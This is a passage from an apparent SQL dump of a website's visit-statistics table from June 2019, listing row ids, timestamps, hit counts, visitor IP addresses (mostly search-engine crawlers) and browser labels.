.207.79','other'),(430110,1561224130,1,1,0,0,'157.55.39.195','other'),(430111,1561224236,2,2,0,0,'178.154.244.11','other'),(430112,1561224653,1,1,0,0,'8.29.198.27','other'),(430113,1561224891,1,1,0,0,'66.249.66.134','chrome'),(430114,1561225925,1,1,0,0,'95.163.255.160','other'),(430115,1561226898,1,1,0,0,'5.45.207.19','other'),(430116,1561226963,1,1,0,0,'207.46.13.4','other'),(430117,1561227606,1,1,0,0,'66.249.66.136','chrome'),(430118,1561227807,2,2,0,0,'66.249.66.68','chrome'),(430119,1561228195,2,2,0,0,'207.46.13.220','other'),(430120,1561229123,1,1,0,0,'207.46.13.17','other'),(430121,1561229703,1,1,0,0,'66.249.66.138','chrome'),(430122,1561229870,1,1,0,0,'46.211.66.134','chrome'),(430123,1561230774,1,1,0,0,'207.46.13.4','other'),(430124,1561231459,1,1,0,0,'134.249.98.209','other'),(430125,1561232661,1,1,0,0,'87.250.224.47','other'),(430126,1561232753,1,1,0,0,'87.250.224.107','other'),(430127,1561233003,1,0,1,0,'66.249.66.136',''),(430128,1561233203,1,1,0,0,'66.249.66.138','chrome'),(430129,1561233208,1,1,0,0,'40.77.167.142','other'),(430130,1561233351,2,2,0,0,'176.9.9.94','other'),(430131,1561234293,1,1,0,0,'193.106.30.98','chrome'),(430132,1561234390,2,2,0,0,'91.196.178.131','chrome'),(430133,1561234926,1,1,0,0,'8.29.198.27','other'),(430134,1561235134,2,2,0,0,'144.76.186.38','other'),(430135,1561235500,1,1,0,0,'8.29.198.25','other'),(430136,1561235927,1,1,0,0,'66.249.66.134','chrome'),(430137,1561236335,1,1,0,0,'91.196.178.164','chrome'),(430138,1561236719,2,2,0,0,'40.77.167.72','other'),(430139,1561237062,1,1,0,0,'207.46.13.4','other'),(430140,1561237304,1,1,0,0,'5.45.207.79','other'),(430141,1561237357,1,1,0,0,'157.55.39.164','other'),(430142,1561237724,1,1,0,0,'66.249.66.136','chrome'),(430143,1561238472,1,1,0,0,'141.8.142.103','other'),(430144,1561238592,1,1,0,0,'157.55.39.164','other'),(430145,1561238618,1,1,0,0,'207.46.13.4','other'),(430146,1561238749,1,1,0,0,'40.77.167.20','other'),(430147,1561239599,1,1,0,0,'104.197.119.124','other'),(430148,1561240128,3,3,0,0,'66.249.66.134','chrome'),(430149,1561240141,2,2,0,0,'66.249.66.136','chrome'),(430150,1561240235,2,2,0,0,'51.77.52.160','chrome'),(430151,1561240286,1,1,0,0,'209.17.96.66','other'),(430152,1561240380,1,1,0,0,'66.249.66.138','chrome'),(430153,1561240601,1,1,0,0,'207.46.13.134','other'),(430154,1561240725,1,1,0,0,'40.77.167.20','other'),(430155,1561240988,1,1,0,0,'178.154.244.11','other'),(430156,1561241211,1,1,0,0,'213.180.203.9','other'),(430157,1561241244,1,1,0,0,'5.45.207.79','other'),(430158,1561241356,1,1,0,0,'157.55.39.164','other'),(430159,1561243337,1,1,0,0,'40.77.167.20','other'),(430160,1561243339,1,1,0,0,'66.249.66.136','chrome'),(430161,1561243604,1,1,0,0,'5.45.207.19','other'),(430162,1561243717,1,1,0,0,'157.55.39.86','other'),(430163,1561243863,1,1,0,0,'66.249.66.66','chrome'),(430164,1561245560,2,2,0,0,'66.249.66.134','chrome'),(430165,1561245793,1,1,0,0,'8.29.198.27','other'),(430166,1561246346,1,1,0,0,'8.29.198.26','other'),(430167,1561247035,1,1,0,0,'66.249.66.68','chrome'),(430168,1561247999,1,1,0,0,'178.154.244.11','other'),(430169,1561249004,1,1,0,0,'207.46.13.15','other'),(430170,1561249130,1,1,0,0,'91.209.11.236','other'),(430171,1561249244,1,1,0,0,'207.46.13.200','other'),(430172,1561249524,1,1,0,0,'178.154.244.11','other'),(430173,1561249527,1,1,0,0,'5.45.207.19','other'),(430174,1561249631,1,1,0,0,'13.66.139.0','other'),(430175,1561250795,1,1,0,0,'5.45.207.79','other'),(430176,1561251005,2,2,0,0,'178.154.244.11','other'),(430177,1561253679,1,1,0,0,'157.55.39.86','other'),(430178,1561253793,2,2,0,0,'40.77.167.116','other'),(430179,1561253813,1,1,0,0,'5.45.207.79','other'),(430180,1561253838,1,1,0,0,'178.154.171.69','other'),(430181,1561254947,1,1,0,0,'40.77.167.116','other'),(430182,1561255398,1,1,0,0,'66.249.66.136','chrome'),(430183,1561256021,2,2,0,0,'13.66.139.0','other'),(430184,1561256673,1,1,0,0,'8.29.198.26','other'),(430185,1561257213,1,1,0,0,'8.29.198.27','other'),(430186,1561257652,1,1,0,0,'207.46.13.200','other'),(430187,1561258036,1,1,0,0,'66.249.66.136','chrome'),(430188,1561258941,2,2,0,0,'207.46.13.15','other'),(430189,1561260005,1,1,0,0,'66.249.66.138','chrome'),(430190,1561260680,2,2,0,0,'178.154.244.11','other'),(430191,1561261637,2,2,0,0,'207.46.13.15','other'),(430192,1561261669,1,1,0,0,'5.45.207.19','other'),(430193,1561262448,1,1,0,0,'66.249.66.136','chrome'),(430194,1561262607,1,1,0,0,'82.193.102.149','other'),(430195,1561262622,1,1,0,0,'176.9.9.94','other'),(430196,1561263054,2,2,0,0,'66.249.66.138','chrome'),(430197,1561263102,1,1,0,0,'40.77.167.101','other'),(430198,1561263389,2,2,0,0,'5.45.207.79','other'),(430199,1561263551,1,1,0,0,'207.46.13.200','other'),(430200,1561264506,1,1,0,0,'40.77.167.101','other'),(430201,1561264807,1,1,0,0,'207.46.13.15','other'),(430202,1561265941,1,1,0,0,'5.45.207.79','other'),(430203,1561266020,1,1,0,0,'40.77.167.101','other'),(430204,1561266426,1,1,0,0,'66.249.66.66','chrome'),(430205,1561266545,1,1,0,0,'66.249.66.134','chrome'),(430206,1561267467,1,1,0,0,'54.36.149.27','other'),(430207,1561267551,1,1,0,0,'8.29.198.27','other'),(430208,1561268056,1,1,0,0,'8.29.198.26','other'),(430209,1561268832,1,1,0,0,'207.46.13.15','other'),(430210,1561269369,1,1,0,0,'54.36.149.32','other'),(430211,1561269541,1,1,0,0,'66.249.66.64','chrome'),(430212,1561269578,1,1,0,0,'66.249.66.136','chrome'),(430213,1561269928,1,1,0,0,'91.196.178.52','chrome'),(430214,1561270085,1,1,0,0,'54.36.149.14','other'),(430215,1561270582,1,1,0,0,'95.163.255.166','other'),(430216,1561270600,1,1,0,0,'207.46.13.200','other'),(430217,1561270610,1,1,0,0,'66.249.66.136','chrome'),(430218,1561270655,2,2,0,0,'157.55.39.83','other'),(430219,1561271100,1,1,0,0,'141.8.183.22','other'),(430220,1561272153,1,1,0,0,'154.16.46.205','chrome'),(430221,1561272345,2,2,0,0,'54.36.149.102','other'),(430222,1561273059,1,1,0,0,'141.8.142.103','other'),(430223,1561273540,2,2,0,0,'207.46.13.200','other'),(430224,1561273679,1,1,0,0,'178.17.174.211','other'),(430225,1561273738,1,1,0,0,'54.36.149.20','other'),(430226,1561273751,1,1,0,0,'54.36.149.52','other'),(430227,1561273764,1,1,0,0,'54.36.149.56','other'),(430228,1561274086,1,1,0,0,'46.211.44.204','chrome'),(430229,1561274493,1,1,0,0,'157.55.39.131','other'),(430230,1561274697,1,1,0,0,'157.55.39.83','other'),(430231,1561274715,2,2,0,0,'66.249.66.134','chrome'),(430232,1561275622,1,1,0,0,'66.249.66.138','chrome'),(430233,1561275840,1,1,0,0,'207.46.13.75','other'),(430234,1561276148,2,2,0,0,'5.45.207.19','other'),(430235,1561276256,1,1,0,0,'157.55.39.131','other'),(430236,1561276271,1,1,0,0,'54.36.149.14','other'),(430237,1561276342,1,1,0,0,'178.154.244.11','other'),(430238,1561276570,1,1,0,0,'95.108.213.4','other'),(430239,1561276931,1,1,0,0,'207.46.13.143','other'),(430240,1561277201,1,1,0,0,'54.36.149.34','other'),(430241,1561277331,1,1,0,0,'40.77.167.12','other'),(430242,1561278423,1,1,0,0,'8.29.198.26','other'),(430243,1561278448,1,1,0,0,'54.36.149.55','other'),(430244,1561278908,1,1,0,0,'8.29.198.25','other'),(430245,1561279162,2,2,0,0,'66.249.66.136','chrome'),(430246,1561279467,1,1,0,0,'213.180.203.48','other'),(430247,1561279752,1,1,0,0,'66.249.66.138','chrome'),(430248,1561279915,1,1,0,0,'54.36.149.100','other'),(430249,1561280781,1,1,0,0,'54.36.149.65','other'),(430250,1561281123,1,1,0,0,'66.249.66.138','chrome'),(430251,1561281368,1,1,0,0,'54.36.149.47','other'),(430252,1561282227,1,1,0,0,'54.36.149.79','other'),(430253,1561283088,2,2,0,0,'66.249.66.134','chrome'),(430254,1561283276,1,1,0,0,'54.36.149.72','other'),(430255,1561283556,1,1,0,0,'54.36.149.12','other'),(430256,1561284389,1,1,0,0,'66.249.66.134','chrome'),(430257,1561284576,1,1,0,0,'109.74.154.72','chrome'),(430258,1561285430,1,1,0,0,'5.45.207.19','other'),(430259,1561285445,1,1,0,0,'178.154.244.11','other'),(430260,1561285602,1,1,0,0,'66.249.66.138','chrome'),(430261,1561285678,1,1,0,0,'58.250.125.67','other'),(430262,1561286051,1,1,0,0,'141.8.142.103','other'),(430263,1561286210,1,1,0,0,'185.253.97.246','firefox'),(430264,1561286464,1,1,0,0,'178.154.244.11','other'),(430265,1561287133,1,1,0,0,'54.36.149.90','other'),(430266,1561287138,1,1,0,0,'66.249.66.138','chrome'),(430267,1561288208,2,2,0,0,'66.249.66.136','chrome'),(430268,1561288323,1,1,0,0,'40.77.167.143','other'),(430269,1561288923,1,1,0,0,'178.154.244.11','other'),(430270,1561289306,1,1,0,0,'8.29.198.25','other'),(430271,1561289748,1,1,0,0,'8.29.198.26','other'),(430272,1561289866,1,1,0,0,'54.36.149.28','other'),(430273,1561290218,1,1,0,0,'157.55.39.143','other'),(430274,1561290923,1,1,0,0,'54.36.149.10','other'),(430275,1561291783,1,1,0,0,'128.124.117.209','chrome'),(430276,1561292204,1,1,0,0,'66.249.66.134','chrome'),(430277,1561292487,1,1,0,0,'46.211.111.128','chrome'),(430278,1561292840,1,1,0,0,'40.77.167.118','other'),(430279,1561292921,1,1,0,0,'54.36.149.44','other'),(430280,1561293812,1,1,0,0,'207.46.13.88','other'),(430281,1561295617,1,1,0,0,'66.249.66.136','chrome'),(430282,1561295631,1,1,0,0,'66.249.66.134','chrome'),(430283,1561296378,1,1,0,0,'54.36.149.55','other'),(430284,1561296861,1,1,0,0,'54.36.149.39','other'),(430285,1561298914,1,1,0,0,'40.77.167.118','other'),(430286,1561299106,1,1,0,0,'157.55.39.143','other'),(430287,1561299363,1,1,0,0,'23.229.70.226','chrome'),(430288,1561299627,1,1,0,0,'54.36.149.24','other'),(430289,1561300029,2,2,0,0,'66.249.66.134','chrome'),(430290,1561300189,1,1,0,0,'8.29.198.26','other'),(430291,1561300312,1,1,0,0,'54.36.149.50','other'),(430292,1561300603,1,1,0,0,'66.249.66.136','chrome'),(430293,1561300628,1,1,0,0,'66.249.66.138','chrome'),(430294,1561300635,1,1,0,0,'8.29.198.27','other'),(430295,1561300675,1,1,0,0,'157.55.39.165','other'),(430296,1561301026,1,1,0,0,'46.242.58.48','msie'),(430297,1561302086,1,1,0,0,'66.249.66.134','chrome'),(430298,1561302276,2,2,0,0,'157.55.39.166','other'),(430299,1561302719,1,1,0,0,'5.45.207.19','other'),(430300,1561302949,1,1,0,0,'207.46.13.198','other'),(430301,1561303050,1,1,0,0,'157.55.39.165','other'),(430302,1561303276,1,1,0,0,'54.36.149.101','other'),(430303,1561303680,1,1,0,0,'157.55.39.166','other'),(430304,1561303839,1,1,0,0,'54.36.149.99','other'),(430305,1561303976,1,1,0,0,'157.55.39.165','other'),(430306,1561304932,1,1,0,0,'5.45.207.19','other'),(430307,1561305037,1,1,0,0,'5.45.207.79','other'),(430308,1561305090,1,1,0,0,'66.249.66.64','chrome'),(430309,1561305530,1,1,0,0,'54.36.149.92','other'),(430310,1561306163,1,1,0,0,'54.36.149.37','other'),(430311,1561306206,1,1,0,0,'157.55.39.165','other'),(430312,1561306249,1,1,0,0,'54.36.149.25','other'),(430313,1561306594,1,1,0,0,'66.249.66.134','chrome'),(430314,1561306798,1,1,0,0,'66.249.66.68','chrome'),(430315,1561306814,1,1,0,0,'66.249.66.138','chrome'),(430316,1561307119,1,1,0,0,'54.36.149.103','other'),(430317,1561307513,1,1,0,0,'54.36.149.70','other'),(430318,1561307599,1,1,0,0,'141.8.142.103','other'),(430319,1561307747,1,1,0,0,'5.45.207.79','other'),(430320,1561308013,1,1,0,0,'66.249.66.134','chrome'),(430321,1561308058,1,1,0,0,'157.55.39.166','other'),(430322,1561308405,2,2,0,0,'207.46.13.198','other'),(430323,1561308678,1,1,0,0,'54.36.149.17','other'),(430324,1561309854,1,1,0,0,'157.55.39.164','other'),(430325,1561310477,1,1,0,0,'193.106.30.98','chrome'),(430326,1561310714,1,1,0,0,'54.36.149.3','other'),(430327,1561310741,1,1,0,0,'54.36.149.94','other'),(430328,1561310889,1,1,0,0,'157.55.39.165','other'),(430329,1561311066,1,1,0,0,'8.29.198.25','other'),(430330,1561311479,1,1,0,0,'8.29.198.26','other'),(430331,1561311555,1,1,0,0,'54.36.149.44','other'),(430332,1561311913,2,2,0,0,'207.46.13.198','other'),(430333,1561311917,1,1,0,0,'157.55.39.165','other'),(430334,1561312131,1,1,0,0,'54.36.149.87','other'),(430335,1561312488,1,1,0,0,'54.36.149.41','other'),(430336,1561312983,1,1,0,0,'151.80.39.16','other'),(430337,1561313780,1,1,0,0,'66.249.66.136','chrome'),(430338,1561314503,2,2,0,0,'157.55.39.165','other'),(430339,1561314640,1,1,0,0,'54.36.149.53','other'),(430340,1561316203,1,1,0,0,'95.108.213.4','other'),(430341,1561316629,1,1,0,0,'91.196.178.101','chrome'),(430342,1561317627,1,1,0,0,'66.249.66.138','chrome'),(430343,1561317674,1,1,0,0,'95.163.255.171','other'),(430344,1561317723,1,1,0,0,'54.36.149.102','other'),(430345,1561317925,2,2,0,0,'157.55.39.221','other'),(430346,1561318786,1,1,0,0,'54.36.149.50','other'),(430347,1561318938,1,1,0,0,'109.201.154.246','other'),(430348,1561319015,1,1,0,0,'157.55.39.221','other'),(430349,1561320204,1,1,0,0,'54.36.149.76','other'),(430350,1561320390,1,1,0,0,'157.55.39.221','other'),(430351,1561320422,1,1,0,0,'207.46.13.27','other'),(430352,1561320882,1,1,0,0,'109.201.138.235','other'),(430353,1561321539,1,1,0,0,'157.55.39.221','other'),(430354,1561321950,1,1,0,0,'8.29.198.27','other'),(430355,1561322038,1,1,0,0,'5.45.207.79','other'),(430356,1561322085,1,1,0,0,'5.45.207.19','other'),(430357,1561322181,1,1,0,0,'66.249.66.138','chrome'),(430358,1561322316,1,1,0,0,'8.29.198.26','other'),(430359,1561322665,1,1,0,0,'157.55.39.221','other'),(430360,1561322691,1,1,0,0,'66.249.66.134','chrome'),(430361,1561322781,1,1,0,0,'207.46.13.15','other'),(430362,1561324801,2,2,0,0,'66.249.66.136','chrome'),(430363,1561325593,1,1,0,0,'66.249.66.68','chrome'),(430364,1561325900,1,1,0,0,'40.77.167.71','other'),(430365,1561326316,1,1,0,0,'66.249.66.134','chrome'),(430366,1561326485,2,2,0,0,'207.46.13.16','other'),(430367,1561326524,1,1,0,0,'66.249.66.136','chrome'),(430368,1561326895,1,1,0,0,'91.209.11.236','other'),(430369,1561329084,2,2,0,0,'207.46.13.27','other'),(430370,1561330563,1,1,0,0,'207.46.13.27','other'),(430371,1561330880,1,1,0,0,'54.36.149.40','other'),(430372,1561331813,1,1,0,0,'66.249.66.134','chrome'),(430373,1561332207,1,1,0,0,'207.46.13.15','other'),(430374,1561332412,2,2,0,0,'207.46.13.69','other'),(430375,1561332587,1,1,0,0,'54.36.149.69','other'),(430376,1561332625,1,1,0,0,'66.249.66.64','chrome'),(430377,1561332680,1,1,0,0,'91.209.11.236','other'),(430378,1561332823,2,2,0,0,'8.29.198.27','other'),(430379,1561332897,1,1,0,0,'66.249.66.136','chrome'),(430380,1561332973,2,2,0,0,'66.249.66.138','chrome'),(430381,1561334577,1,1,0,0,'54.36.149.74','other'),(430382,1561334813,1,1,0,0,'178.137.89.234','chrome'),(430383,1561335029,1,1,0,0,'13.66.139.0','other'),(430384,1561335743,1,1,0,0,'5.45.207.19','other'),(430385,1561335841,2,2,0,0,'178.154.244.11','other'),(430386,1561336269,1,1,0,0,'207.46.13.15','other'),(430387,1561336671,1,1,0,0,'207.46.13.69','other'),(430388,1561336883,2,2,0,0,'207.46.13.16','other'),(430389,1561337393,1,1,0,0,'54.36.149.55','other'),(430390,1561338192,1,1,0,0,'54.36.149.44','other'),(430391,1561339552,1,1,0,0,'54.36.149.42','other'),(430392,1561340141,1,1,0,0,'207.46.13.15','other'),(430393,1561340702,1,1,0,0,'54.36.149.37','other'),(430394,1561340955,2,2,0,0,'207.46.13.69','other'),(430395,1561342035,1,1,0,0,'54.36.149.74','other'),(430396,1561342178,1,1,0,0,'207.46.13.16','other'),(430397,1561342183,1,1,0,0,'207.46.13.15','other'),(430398,1561342330,1,1,0,0,'54.36.149.45','other'),(430399,1561343578,1,1,0,0,'54.36.149.78','other'),(430400,1561343689,1,1,0,0,'8.29.198.27','other'),(430401,1561343718,1,1,0,0,'54.36.149.64','other'),(430402,1561344028,1,1,0,0,'8.29.198.25','other'),(430403,1561344193,1,1,0,0,'54.36.149.27','other'),(430404,1561344400,1,1,0,0,'178.154.244.65','other'),(430405,1561344646,1,1,0,0,'66.249.66.138','chrome'),(430406,1561344983,1,1,0,0,'95.108.181.83','other'),(430407,1561345089,1,1,0,0,'95.163.255.95','other'),(430408,1561346595,1,1,0,0,'40.77.167.86','other'),(430409,1561348717,1,1,0,0,'207.46.13.190','other'),(430410,1561350171,1,1,0,0,'5.45.207.19','other'),(430411,1561350286,1,1,0,0,'95.163.255.152','other'),(430412,1561351294,1,1,0,0,'207.46.13.190','other'),(430413,1561352245,3,3,0,0,'157.55.39.75','other'),(430414,1561353240,1,1,0,0,'178.154.244.65','other'),(430415,1561353249,1,1,0,0,'178.154.171.27','other'),(430416,1561353251,1,1,0,0,'40.77.167.212','other'),(430417,1561353271,1,1,0,0,'95.108.181.75','other'),(430418,1561353318,1,1,0,0,'66.249.66.66','chrome'),(430419,1561353465,1,1,0,0,'46.166.190.155','other'),(430420,1561354048,1,1,0,0,'91.209.11.236','other'),(430421,1561354308,1,1,0,0,'66.249.66.136','chrome'),(430422,1561354565,1,1,0,0,'8.29.198.25','other'),(430423,1561354808,1,1,0,0,'46.165.230.5','other'),(430424,1561354844,1,1,0,0,'178.137.89.234','chrome'),(430425,1561354883,1,1,0,0,'8.29.198.27','other'),(430426,1561355529,1,1,0,0,'66.249.66.66','chrome'),(430427,1561357106,1,1,0,0,'193.106.30.98','chrome'),(430428,1561357283,1,1,0,0,'95.108.181.83','other'),(430429,1561357366,1,1,0,0,'141.8.132.16','other'),(430430,1561358034,1,1,0,0,'91.196.178.79','chrome'),(430431,1561358069,1,1,0,0,'87.250.224.81','other'),(430432,1561358741,1,1,0,0,'66.249.66.134','chrome'),(430433,1561359339,1,1,0,0,'46.166.190.150','other'),(430434,1561360021,2,2,0,0,'207.46.13.150','other'),(430435,1561360651,1,1,0,0,'40.77.167.212','other'),(430436,1561360667,1,1,0,0,'144.76.3.131','other'),(430437,1561361214,1,1,0,0,'66.249.66.138','chrome'),(430438,1561362623,1,1,0,0,'82.207.49.58','chrome'),(430439,1561363009,1,1,0,0,'91.196.178.181','chrome'),(430440,1561364155,1,1,0,0,'91.209.11.236','other'),(430441,1561364394,1,1,0,0,'66.249.66.138','chrome'),(430442,1561364906,1,1,0,0,'5.45.207.19','other'),(430443,1561365340,1,1,0,0,'91.209.11.236','other'),(430444,1561365456,1,1,0,0,'8.29.198.26','other'),(430445,1561365767,1,1,0,0,'8.29.198.27','other'),(430446,1561365808,1,1,0,0,'5.45.207.19','other'),(430447,1561366229,1,1,0,0,'66.249.66.134','chrome'),(430448,1561366637,1,1,0,0,'46.211.209.246','firefox'),(430449,1561366878,1,1,0,0,'66.249.66.136','chrome'),(430450,1561366889,1,1,0,0,'5.45.207.79','other'),(430451,1561367346,1,1,0,0,'66.249.66.66','chrome'),(430452,1561367385,1,1,0,0,'207.46.13.241','other'),(430453,1561367860,1,1,0,0,'91.196.177.46','firefox'),(430454,1561368230,1,1,0,0,'66.249.66.134','chrome'),(430455,1561368517,1,1,0,0,'46.219.27.39','chrome'),(430456,1561369635,1,1,0,0,'77.111.244.209','chrome'),(430457,1561369660,1,1,0,0,'87.250.224.47','other'),(430458,1561369751,1,1,0,0,'66.249.66.138','chrome'),(430459,1561370235,3,3,0,0,'40.77.167.122','other'),(430460,1561370239,3,3,0,0,'40.77.167.47','other'),(430461,1561370567,2,2,0,0,'40.77.167.137','other'),(430462,1561371669,1,1,0,0,'109.74.154.72','chrome'),(430463,1561371735,2,2,0,0,'40.77.167.57','other'),(430464,1561372291,1,1,0,0,'13.66.139.0','other'),(430465,1561373557,1,1,0,0,'91.196.178.135','firefox'),(430466,1561373763,1,1,0,0,'46.96.49.182','chrome'),(430467,1561373828,1,1,0,0,'66.249.66.134','chrome'),(430468,1561374474,1,1,0,0,'37.53.100.111','chrome'),(430469,1561375010,2,2,0,0,'40.77.167.137','other'),(430470,1561375099,1,1,0,0,'5.45.207.19','other'),(430471,1561375162,2,2,0,0,'66.249.66.136','chrome'),(430472,1561375182,3,3,0,0,'66.249.66.134','chrome'),(430473,1561375410,1,1,0,0,'66.249.66.138','chrome'),(430474,1561375547,1,1,0,0,'23.247.81.42','chrome'),(430475,1561375701,2,2,0,0,'207.46.13.123','other'),(430476,1561375848,1,1,0,0,'66.249.66.64','chrome'),(430477,1561375866,1,1,0,0,'37.145.56.99','firefox'),(430478,1561375870,1,1,0,0,'128.74.163.149','chrome'),(430479,1561376318,2,2,0,0,'207.46.13.163','other'),(430480,1561376446,1,1,0,0,'8.29.198.25','other'),(430481,1561376647,1,1,0,0,'8.29.198.27','other'),(430482,1561377163,1,1,0,0,'40.77.167.137','other'),(430483,1561377703,1,1,0,0,'207.46.13.163','other'),(430484,1561377755,1,1,0,0,'141.8.142.103','other'),(430485,1561377945,1,1,0,0,'40.77.167.80','other'),(430486,1561378983,1,1,0,0,'5.45.207.79','other'),(430487,1561379479,1,1,0,0,'40.77.167.80','other'),(430488,1561379738,1,1,0,0,'91.209.11.236','other'),(430489,1561380059,1,1,0,0,'91.196.178.189','chrome'),(430490,1561380301,1,1,0,0,'207.46.13.123','other'),(430491,1561380689,2,2,0,0,'91.209.11.236','other'),(430492,1561381450,1,1,0,0,'207.46.13.163','other'),(430493,1561382581,1,1,0,0,'66.249.66.138','chrome'),(430494,1561383020,1,1,0,0,'207.46.13.163','other'),(430495,1561383071,1,1,0,0,'141.8.142.103','other'),(430496,1561383092,1,1,0,0,'40.77.167.161','other'),(430497,1561383269,1,1,0,0,'95.132.51.26','chrome'),(430498,1561383977,1,1,0,0,'91.196.177.46','firefox'),(430499,1561383987,1,1,0,0,'66.249.66.136','chrome'),(430500,1561384242,1,1,0,0,'91.196.178.69','firefox'),(430501,1561384477,3,3,0,0,'148.251.70.179','other'),(430502,1561384576,2,2,0,0,'66.249.66.134','chrome'),(430503,1561385233,1,1,0,0,'207.46.13.163','other'),(430504,1561385287,1,1,0,0,'66.249.66.68','chrome'),(430505,1561385843,1,1,0,0,'91.196.178.99','chrome'),(430506,1561386954,1,1,0,0,'40.77.167.49','other'),(430507,1561387028,1,1,0,0,'178.154.244.11','other'),(430508,1561387102,1,1,0,0,'40.77.167.51','other'),(430509,1561387331,1,1,0,0,'5.45.207.19','other'),(430510,1561387372,1,1,0,0,'8.29.198.27','other'),(430511,1561387565,1,1,0,0,'8.29.198.26','other'),(430512,1561387710,1,1,0,0,'46.211.101.167','chrome'),(430513,1561387788,2,2,0,0,'40.77.167.130','other'),(430514,1561387792,6,6,0,0,'157.55.39.224','other'),(430515,1561388577,1,1,0,0,'95.163.255.93','other'),(430516,1561389354,2,2,0,0,'40.77.167.49','other'),(430517,1561389736,1,1,0,0,'66.249.66.136','chrome'),(430518,1561390219,1,1,0,0,'157.55.39.224','other'),(430519,1561390245,1,1,0,0,'91.209.11.236','other'),(430520,1561390454,1,1,0,0,'207.46.13.105','other'),(430521,1561391222,1,1,0,0,'5.45.207.19','other'),(430522,1561391597,1,1,0,0,'5.3.153.215','msie'),(430523,1561391599,1,1,0,0,'5.228.197.20','msie'),(430524,1561392655,1,1,0,0,'40.77.167.130','other'),(430525,1561393459,1,1,0,0,'78.111.186.168','chrome'),(430526,1561395182,1,1,0,0,'40.77.167.163','other'),(430527,1561395360,1,1,0,0,'157.55.39.224','other'),(430528,1561396054,1,1,0,0,'178.92.171.205','chrome'),(430529,1561397838,1,1,0,0,'157.55.39.224','other'),(430530,1561398257,2,2,0,0,'40.77.167.169','other'),(430531,1561398278,1,1,0,0,'8.29.198.26','other'),(430532,1561398462,1,1,0,0,'8.29.198.25','other'),(430533,1561398940,1,1,0,0,'178.154.244.11','other'),(430534,1561399299,1,1,0,0,'141.8.142.103','other'),(430535,1561399375,2,2,0,0,'40.77.167.169','other'),(430536,1561399847,1,1,0,0,'46.96.48.77','chrome'),(430537,1561400180,1,1,0,0,'157.55.39.224','other'),(430538,1561400537,1,0,1,0,'66.249.66.136',''),(430539,1561400753,1,1,0,0,'157.55.39.117','other'),(430540,1561401095,1,1,0,0,'66.249.66.136','chrome'),(430541,1561401863,2,2,0,0,'40.77.167.169','other'),(430542,1561402209,1,1,0,0,'66.249.66.134','chrome'),(430543,1561403000,2,2,0,0,'188.163.18.182','chrome'),(430544,1561403189,1,1,0,0,'40.77.167.163','other'),(430545,1561403205,1,1,0,0,'188.163.18.182','other'),(430546,1561403211,2,2,0,0,'188.163.18.182','msie'),(430547,1561403232,1,1,0,0,'66.249.66.68','chrome'),(430548,1561403269,2,2,0,0,'66.249.66.136','chrome'),(430549,1561403360,1,1,0,0,'95.132.30.32','other'),(430550,1561403425,3,3,0,0,'66.249.66.138','chrome'),(430551,1561403447,1,1,0,0,'157.55.39.117','other'),(430552,1561403501,1,1,0,0,'66.249.66.66','chrome'),(430553,1561403576,1,1,0,0,'178.154.244.11','other'),(430554,1561403736,3,3,0,0,'66.249.66.134','chrome'),(430555,1561403854,1,1,0,0,'66.249.66.64','chrome'),(430556,1561404698,1,1,0,0,'66.249.66.134','chrome'),(430557,1561405361,2,2,0,0,'95.213.141.126','opera'),(430558,1561405768,1,1,0,0,'157.55.39.117','other'),(430559,1561405966,1,1,0,0,'157.55.39.224','other'),(430560,1561406578,1,1,0,0,'207.46.13.59','other'),(430561,1561407249,1,1,0,0,'95.163.255.173','other'),(430562,1561407539,1,1,0,0,'66.249.66.134','chrome'),(430563,1561408572,1,1,0,0,'77.111.244.150','chrome'),(430564,1561408856,1,1,0,0,'157.55.39.224','other'),(430565,1561408915,1,1,0,0,'91.196.178.163','chrome'),(430566,1561409172,1,1,0,0,'8.29.198.25','other'),(430567,1561409336,1,1,0,0,'8.29.198.26','other'),(430568,1561409935,1,1,0,0,'66.249.66.136','chrome'),(430569,1561410406,1,1,0,0,'207.46.13.59','other'),(430570,1561410815,2,2,0,0,'157.55.39.224','other'),(430571,1561411244,2,2,0,0,'66.249.66.134','chrome'),(430572,1561412754,1,1,0,0,'95.163.255.168','other'),(430573,1561412948,3,3,0,0,'157.55.39.224','other'),(430574,1561413119,1,1,0,0,'66.249.66.134','chrome'),(430575,1561415710,1,1,0,0,'66.249.66.138','chrome'),(430576,1561415719,1,1,0,0,'66.249.66.134','chrome'),(430577,1561415978,1,1,0,0,'40.77.167.170','other'),(430578,1561416108,1,1,0,0,'66.249.66.64','chrome'),(430579,1561416185,1,1,0,0,'178.154.244.11','other'),(430580,1561416189,1,1,0,0,'37.9.113.148','other'),(430581,1561416329,1,1,0,0,'95.163.255.185','other'),(430582,1561417184,1,1,0,0,'157.55.39.85','other'),(430583,1561418138,1,1,0,0,'66.249.66.136','chrome'),(430584,1561418348,1,1,0,0,'157.55.39.87','other'),(430585,1561418557,1,1,0,0,'5.45.207.19','other'),(430586,1561418760,1,1,0,0,'141.8.142.103','other'),(430587,1561420039,2,2,0,0,'8.29.198.25','other'),(430588,1561421108,1,1,0,0,'95.163.255.159','other'),(430589,1561422224,1,1,0,0,'207.46.13.45','other'),(430590,1561422462,1,1,0,0,'5.45.207.79','other'),(430591,1561422558,1,1,0,0,'178.154.244.11','other'),(430592,1561422976,1,1,0,0,'40.77.167.130','other'),(430593,1561423286,1,1,0,0,'157.55.39.154','other'),(430594,1561423519,1,1,0,0,'40.77.167.67','other'),(430595,1561424375,1,1,0,0,'157.55.39.154','other'),(430596,1561424784,1,1,0,0,'40.77.167.67','other'),(430597,1561424894,1,1,0,0,'40.77.167.59','other'),(430598,1561425835,3,3,0,0,'66.249.66.138','chrome'),(430599,1561427098,1,1,0,0,'207.46.13.95','other'),(430600,1561429058,1,1,0,0,'178.154.244.11','other'),(430601,1561429124,1,1,0,0,'40.77.167.67','other'),(430602,1561430358,1,1,0,0,'207.46.13.95','other'),(430603,1561430931,2,2,0,0,'8.29.198.27','other'),(430604,1561431489,1,1,0,0,'66.249.66.68','chrome'),(430605,1561431491,1,1,0,0,'141.8.142.103','other'),(430606,1561431578,1,1,0,0,'207.46.13.95','other'),(430607,1561432172,1,1,0,0,'40.77.167.59','other'),(430608,1561432514,1,1,0,0,'5.45.207.79','other'),(430609,1561432975,1,1,0,0,'13.66.139.0','other'),(430610,1561433127,1,1,0,0,'66.249.66.66','chrome'),(430611,1561433715,1,1,0,0,'37.55.150.191','chrome'),(430612,1561433751,1,1,0,0,'5.45.207.79','other'),(430613,1561433800,1,1,0,0,'40.77.167.59','other'),(430614,1561434504,1,1,0,0,'66.249.66.134','chrome'),(430615,1561434614,1,1,0,0,'66.249.66.136','chrome'),(430616,1561434814,1,1,0,0,'176.9